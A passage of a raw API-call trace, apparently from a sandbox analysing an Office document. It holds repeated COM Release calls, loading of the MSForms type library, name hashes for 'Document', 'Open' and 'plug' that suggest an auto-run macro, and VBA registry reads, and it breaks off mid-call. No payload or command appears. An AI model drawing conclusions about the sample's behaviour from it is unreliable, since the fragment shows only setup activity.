returned 0x0 [0031.536] IUnknown:Release (This=0x780b9a8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd698) returned 0x0 [0031.536] IUnknown:Release (This=0x780ba08) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd6f0) returned 0x0 [0031.536] IUnknown:Release (This=0x780ba68) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd748) returned 0x0 [0031.536] IUnknown:Release (This=0x780bac8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd7a0) returned 0x0 [0031.536] IUnknown:Release (This=0x780bb28) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd7f8) returned 0x0 [0031.536] IUnknown:Release (This=0x780bb88) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd850) returned 0x0 [0031.536] IUnknown:Release (This=0x780bbe8) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd900) returned 0x0 [0031.536] IUnknown:Release (This=0x780bc48) returned 0x0 [0031.536] IUnknown:Release (This=0xb4cd9b0) returned 0x0 [0031.537] IUnknown:Release (This=0x780bca8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cda08) returned 0x0 [0031.537] IUnknown:Release (This=0x780bd08) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdab8) returned 0x0 [0031.537] IUnknown:Release (This=0x780bd68) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdb68) returned 0x0 [0031.537] IUnknown:Release (This=0x780bdc8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdc18) returned 0x0 [0031.537] IUnknown:Release (This=0x780be28) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdcc8) returned 0x0 [0031.537] IUnknown:Release (This=0x780be88) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdd78) returned 0x0 [0031.537] IUnknown:Release (This=0x780bee8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cde28) returned 0x0 [0031.537] IUnknown:Release (This=0x780bf48) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cded8) returned 0x0 [0031.537] IUnknown:Release (This=0x780bfa8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cdf88) returned 0x0 [0031.537] IUnknown:Release (This=0x780c008) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce038) returned 0x0 [0031.537] IUnknown:Release (This=0x780c068) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce0e8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c0c8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce198) returned 0x0 [0031.537] IUnknown:Release (This=0x780c128) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce248) returned 0x0 [0031.537] IUnknown:Release (This=0x780c188) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce2f8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c1e8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce3a8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c248) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce458) returned 0x0 [0031.537] IUnknown:Release (This=0x780c2a8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce508) returned 0x0 [0031.537] IUnknown:Release (This=0x780c308) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce5b8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c368) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce668) returned 0x0 [0031.537] IUnknown:Release (This=0x780c3c8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce718) returned 0x0 [0031.537] IUnknown:Release (This=0x780c428) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce7c8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c488) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce878) returned 0x0 [0031.537] IUnknown:Release (This=0x780c4e8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce928) returned 0x0 [0031.537] IUnknown:Release (This=0x780c548) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce980) returned 0x0 [0031.537] IUnknown:Release (This=0x780c5a8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ce9d8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c608) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cea30) returned 0x0 [0031.537] IUnknown:Release (This=0x780c668) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cea88) returned 0x0 [0031.537] IUnknown:Release (This=0x780c6c8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ceae0) returned 0x0 [0031.537] IUnknown:Release (This=0x780c728) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ceb38) returned 0x0 [0031.537] IUnknown:Release (This=0x780c788) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ceb90) returned 0x0 [0031.537] IUnknown:Release (This=0x780c7e8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cebe8) returned 0x0 [0031.537] IUnknown:Release (This=0x780c848) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cec40) returned 0x0 [0031.537] IUnknown:Release (This=0x780c8a8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cec98) returned 0x0 [0031.537] IUnknown:Release (This=0x780c908) returned 0x0 [0031.537] IUnknown:Release (This=0xb4cecf0) returned 0x0 [0031.537] IUnknown:Release (This=0x780c968) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ced48) returned 0x0 [0031.537] IUnknown:Release (This=0x780c9c8) returned 0x0 [0031.537] IUnknown:Release (This=0xb4ceda0) returned 0x0 [0031.537] IUnknown:Release (This=0x780ca28) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cedf8) returned 0x0 [0031.538] IUnknown:Release (This=0x780ca88) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cee50) returned 0x0 [0031.538] IUnknown:Release (This=0x780cae8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4ceea8) returned 0x0 [0031.538] IUnknown:Release (This=0x780cb48) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cef00) returned 0x0 [0031.538] IUnknown:Release (This=0x780cba8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cef58) returned 0x0 [0031.538] IUnknown:Release (This=0x780cd28) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cefb0) returned 0x0 [0031.538] IUnknown:Release (This=0x780cd88) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf008) returned 0x0 [0031.538] IUnknown:Release (This=0x780cde8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf060) returned 0x0 [0031.538] IUnknown:Release (This=0x780ce48) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf0b8) returned 0x0 [0031.538] IUnknown:Release (This=0x780cea8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf110) returned 0x0 [0031.538] IUnknown:Release (This=0x780cf08) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf168) returned 0x0 [0031.538] IUnknown:Release (This=0x780cf68) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf1c0) returned 0x0 [0031.538] IUnknown:Release (This=0x780cfc8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf218) returned 0x0 [0031.538] IUnknown:Release (This=0x780d028) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf270) returned 0x0 [0031.538] IUnknown:Release (This=0x780d088) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf2c8) returned 0x0 [0031.538] IUnknown:Release (This=0x780d0e8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf320) returned 0x0 [0031.538] IUnknown:Release (This=0x780d148) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf378) returned 0x0 [0031.538] IUnknown:Release (This=0x780d1a8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf3d0) returned 0x0 [0031.538] IUnknown:Release (This=0x780d208) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf428) returned 0x0 [0031.538] IUnknown:Release (This=0x780d268) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf480) returned 0x0 [0031.538] IUnknown:Release (This=0x780d2c8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf4d8) returned 0x0 [0031.538] IUnknown:Release (This=0x780d328) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf530) returned 0x0 [0031.538] IUnknown:Release (This=0x780d388) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf588) returned 0x0 [0031.538] IUnknown:Release (This=0x780d3e8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf5e0) returned 0x0 [0031.538] IUnknown:Release (This=0x780d448) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf638) returned 0x0 [0031.538] IUnknown:Release (This=0x780d4a8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf690) returned 0x0 [0031.538] IUnknown:Release (This=0x780d508) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf6e8) returned 0x0 [0031.538] IUnknown:Release (This=0x780d568) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf740) returned 0x0 [0031.538] IUnknown:Release (This=0x780d5c8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf798) returned 0x0 [0031.538] IUnknown:Release (This=0x780d628) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf7f0) returned 0x0 [0031.538] IUnknown:Release (This=0x780d688) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf848) returned 0x0 [0031.538] IUnknown:Release (This=0x780d6e8) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf8a0) returned 0x0 [0031.538] IUnknown:Release (This=0x780d748) returned 0x0 [0031.538] IUnknown:Release (This=0xb4cf8f8) returned 0x0 [0031.538] IUnknown:Release (This=0x780d808) returned 0x0 [0031.538] IUnknown:Release (This=0x780d868) returned 0x0 [0031.538] IUnknown:Release (This=0x780d928) returned 0x0 [0031.538] IUnknown:Release (This=0x780d988) returned 0x0 [0031.538] IUnknown:Release (This=0x780da48) returned 0x0 [0031.538] IUnknown:Release (This=0x780daa8) returned 0x0 [0031.538] IUnknown:Release (This=0x780db08) returned 0x0 [0031.538] IUnknown:Release (This=0x780db68) returned 0x0 [0031.539] IUnknown:Release (This=0x780dbc8) returned 0x0 [0031.539] IUnknown:Release (This=0x780dc28) returned 0x0 [0031.539] IUnknown:Release (This=0x780dc88) returned 0x0 [0031.539] IUnknown:Release (This=0x780dce8) returned 0x0 [0031.539] IUnknown:Release (This=0x780de68) returned 0x0 [0031.539] IUnknown:Release (This=0x780dec8) returned 0x0 [0031.539] IUnknown:Release (This=0x780df28) returned 0x0 [0031.539] IUnknown:Release (This=0x780df88) returned 0x0 [0031.539] IUnknown:Release (This=0x780dfe8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e048) returned 0x0 [0031.539] IUnknown:Release (This=0x780e0a8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e108) returned 0x0 [0031.539] IUnknown:Release (This=0x780e168) returned 0x0 [0031.539] IUnknown:Release (This=0x780e1c8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e228) returned 0x0 [0031.539] IUnknown:Release (This=0x780e288) returned 0x0 [0031.539] IUnknown:Release (This=0x780e2e8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e348) returned 0x0 [0031.539] IUnknown:Release (This=0x780e3a8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e408) returned 0x0 [0031.539] IUnknown:Release (This=0x780e468) returned 0x0 [0031.539] IUnknown:Release (This=0x780e4c8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e528) returned 0x0 [0031.539] IUnknown:Release (This=0x780e588) returned 0x0 [0031.539] IUnknown:Release (This=0x780e5e8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e648) returned 0x0 [0031.539] IUnknown:Release (This=0x780e6a8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e708) returned 0x0 [0031.539] IUnknown:Release (This=0x780e768) returned 0x0 [0031.539] IUnknown:Release (This=0x780e7c8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e828) returned 0x0 [0031.539] IUnknown:Release (This=0x780e888) returned 0x0 [0031.539] IUnknown:Release (This=0x780e8e8) returned 0x0 [0031.539] IUnknown:Release (This=0x780e948) returned 0x0 [0031.539] IUnknown:Release (This=0x780e9a8) returned 0x0 [0031.539] IUnknown:Release (This=0x780ea08) returned 0x0 [0031.539] IUnknown:Release (This=0x780ea68) returned 0x0 [0031.539] IUnknown:Release (This=0x780eac8) returned 0x0 [0031.539] IUnknown:Release (This=0x780eb28) returned 0x0 [0031.539] IUnknown:Release (This=0x780eb88) returned 0x0 [0031.539] IUnknown:Release (This=0x780ed08) returned 0x0 [0031.539] IUnknown:Release (This=0x780ed68) returned 0x0 [0031.539] IUnknown:Release (This=0x780edc8) returned 0x0 [0031.539] IUnknown:Release (This=0x780ee28) returned 0x0 [0031.539] IUnknown:Release (This=0x780ee88) returned 0x0 [0031.539] IUnknown:Release (This=0x780eee8) returned 0x0 [0031.539] IUnknown:Release (This=0x780ef48) returned 0x0 [0031.539] IUnknown:Release (This=0x780efa8) returned 0x0 [0031.539] IUnknown:Release (This=0x780f008) returned 0x0 [0031.539] IUnknown:Release (This=0x780f068) returned 0x0 [0031.539] IUnknown:Release (This=0x780f0c8) returned 0x0 [0031.539] IUnknown:Release (This=0x780f128) returned 0x0 [0031.539] IUnknown:Release (This=0x780f188) returned 0x0 [0031.539] IUnknown:Release (This=0x780f1e8) returned 0x0 [0031.539] IUnknown:Release (This=0x780f248) returned 0x0 [0031.539] IUnknown:Release (This=0x780f2a8) returned 0x0 [0031.539] IUnknown:Release (This=0x780f308) returned 0x0 [0031.539] IUnknown:Release (This=0x780f368) returned 0x0 [0031.539] IUnknown:Release (This=0x780f3c8) returned 0x0 [0031.539] IUnknown:Release (This=0x780f428) returned 0x0 [0031.539] IUnknown:Release (This=0x780f488) returned 0x0 [0031.540] LoadTypeLib (in: szFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd", pptlib=0x2e6ca8*=0x0 | out: pptlib=0x2e6ca8*=0x782b8a0) returned 0x0 [0031.543] StringFromGUID2 (in: rguid=0x7667f20*(Data1=0x4efeb580, Data2=0x181d, Data3=0x466e, Data4=([0]=0x88, [1]=0xfd, [2]=0x21, [3]=0xda, [4]=0x71, [5]=0x3, [6]=0xe4, [7]=0x66)), lpsz=0x2e6cc0, cchMax=39 | out: lpsz="{4EFEB580-181D-466E-88FD-21DA7103E466}") returned 39 [0031.544] QueryPathOfRegTypeLib (in: guid=0x7667f20*(Data1=0x4efeb580, Data2=0x181d, Data3=0x466e, Data4=([0]=0x88, [1]=0xfd, [2]=0x21, [3]=0xda, [4]=0x71, [5]=0x3, [6]=0xe4, [7]=0x66)), wMaj=0x2, wMin=0x0, lcid=0x0, lpbstrPathName=0x2e6c68 | out: lpbstrPathName=0x2e6c68) returned 0x0 [0031.545] IUnknown:QueryInterface (in: This=0x782b8a0, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6b88 | out: ppvObject=0x2e6b88*=0x0) returned 0x80004002 [0031.545] ITypeLib:RemoteGetLibAttr (in: This=0x782b8a0, ppTLibAttr=0x2e6b80, pDummy=0x10 | out: ppTLibAttr=0x2e6b80, pDummy=0x10) returned 0x0 [0031.545] ITypeLib:RemoteGetDocumentation (in: This=0x782b8a0, index=-1, refPtrFlags=0x0, pBstrName=0x2e6b78, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xb4c67d6 | out: pBstrName=0x2e6b78*="Microsoft Forms 2.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xb4c67d6) returned 0x0 [0031.545] StringFromGUID2 (in: rguid=0x7665f40*(Data1=0x4efeb580, Data2=0x181d, Data3=0x466e, Data4=([0]=0x88, [1]=0xfd, [2]=0x21, [3]=0xda, [4]=0x71, [5]=0x3, [6]=0xe4, [7]=0x66)), lpsz=0x2e6ba0, cchMax=39 | out: lpsz="{4EFEB580-181D-466E-88FD-21DA7103E466}") returned 39 [0031.545] _ultow_s (in: _Value=0x2, _Buffer=0x2e6aea, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0031.545] _ultow_s (in: _Value=0x0, _Buffer=0x2e6aee, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0031.545] _ultow_s (in: _Value=0x0, _Buffer=0x2e6af2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0031.545] wcscpy_s (in: _Destination=0x7822c38, _SizeInWords=0x88, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0031.545] wcscpy_s (in: _Destination=0x7822c3e, _SizeInWords=0x85, _Source="{4EFEB580-181D-466E-88FD-21DA7103E466}" | out: _Destination="{4EFEB580-181D-466E-88FD-21DA7103E466}") returned 0x0 [0031.545] wcscpy_s (in: _Destination=0x7822c8a, _SizeInWords=0x5f, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0031.545] wcscpy_s (in: _Destination=0x7822c98, _SizeInWords=0x58, _Source="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd" | out: _Destination="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd") returned 0x0 [0031.545] wcscpy_s (in: _Destination=0x7822d02, _SizeInWords=0x23, _Source="Microsoft Forms 2.0 Object Library" | out: _Destination="Microsoft Forms 2.0 Object Library") returned 0x0 [0031.545] strcpy_s (in: _Dst=0xb4ffe58, _DstSize=0x35, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd") returned 0x0 [0031.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0031.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0031.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0031.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e7680 [0031.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809ae0 [0031.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809a80 [0031.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x60) returned 0x77745b0 [0031.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plug") returned 0x10ba29 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809960 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4911f0 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4911f0 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4911f0 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb4911f0 [0031.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb4911f0 [0031.554] IUnknown:AddRef (This=0x778f4c0) returned 0x2 [0031.554] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f6860 [0031.554] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f6860) returned 0x8 [0031.555] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb492870 [0031.555] CLSIDFromString (in: lpsz="{398DD4CA-01F3-4391-A152-41466FAD2864}", pclsid=0xb492870 | out: pclsid=0xb492870*(Data1=0x398dd4ca, Data2=0x1f3, Data3=0x4391, Data4=([0]=0xa1, [1]=0x52, [2]=0x41, [3]=0x46, [4]=0x6f, [5]=0xad, [6]=0x28, [7]=0x64))) returned 0x0 [0031.565] lstrcpyA (in: lpString1=0x2e5e20, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.565] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.565] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.565] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5fb8 | out: phkResult=0x2e5fb8*=0xa3c) returned 0x0 [0031.566] RegisterClassExA (param_1=0x2e5fd0) returned 0x5225008fc19f [0031.566] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1000c0fd0000018f) returned 1 [0031.566] GetSystemMetrics (nIndex=50) returned 16 [0031.566] GetSystemMetrics (nIndex=49) returned 16 [0031.566] RegisterClassExA (param_1=0x2e5fd0) returned 0x52300377c1a1 [0031.566] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1000c0fd00000190) returned 1 [0031.566] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3350, lpBuffer=0x2e3f30, cchBufferMax=512 | out: lpBuffer="Microsoft Visual Basic for Applications") returned 0x27 [0031.568] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x0, uMsg=0x81, wParam=0x0, lParam=0x2e5930) returned 0x1 [0031.568] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x0, uMsg=0x83, wParam=0x0, lParam=0x2e5980) returned 0x0 [0031.569] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x0, uMsg=0x1, wParam=0x0, lParam=0x2e58e0) returned 0x0 [0031.569] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x0, uMsg=0x210, wParam=0xcac0001, lParam=0x10224) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x24, wParam=0x0, lParam=0x2e5970) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x81, wParam=0x0, lParam=0x2e5940) returned 0x1 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x83, wParam=0x0, lParam=0x2e5990) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x1, wParam=0x0, lParam=0x2e5940) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x5, wParam=0x0, lParam=0x2120482) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x3, wParam=0x0, lParam=0x1e0008) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x46, wParam=0x0, lParam=0x2e5c90) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x22, wParam=0x0, lParam=0x0) returned 0x0 [0031.570] DefMDIChildProcA (hWnd=0x10226, uMsg=0x46, wParam=0x0, lParam=0x2e58f0) returned 0x0 [0031.570] SendMessageA (hWnd=0x10224, Msg=0x224, wParam=0x10226, lParam=0x0) returned 0x0 [0031.570] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.571] DefMDIChildProcA (hWnd=0x10226, uMsg=0x222, wParam=0x0, lParam=0x10226) returned 0x0 [0031.674] lstrcpyW (in: lpString1=0x2e5c70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" [0031.782] lstrcpyA (in: lpString1=0x2e5e10, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.782] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.782] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.782] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5fa8 | out: phkResult=0x2e5fa8*=0xa60) returned 0x0 [0031.783] lstrcpyA (in: lpString1=0x2e5e10, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.783] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.783] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.783] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5fa8 | out: phkResult=0x2e5fa8*=0xa60) returned 0x0 [0031.784] lstrcpyA (in: lpString1=0x2e5e10, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.784] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.784] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.784] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5fa8 | out: phkResult=0x2e5fa8*=0xa60) returned 0x0 [0031.785] lstrcpyA (in: lpString1=0x2e5e10, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.785] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.785] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.785] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5fa8 | out: phkResult=0x2e5fa8*=0xa60) returned 0x0 [0031.785] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.785] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.785] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.786] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.786] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.786] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.786] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.786] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.787] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.787] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.787] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.787] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f88 | out: phkResult=0x2e5f88*=0xa60) returned 0x0 [0031.789] lstrcpyA (in: lpString1=0x2e5df0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.789] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.790] lstrcatA 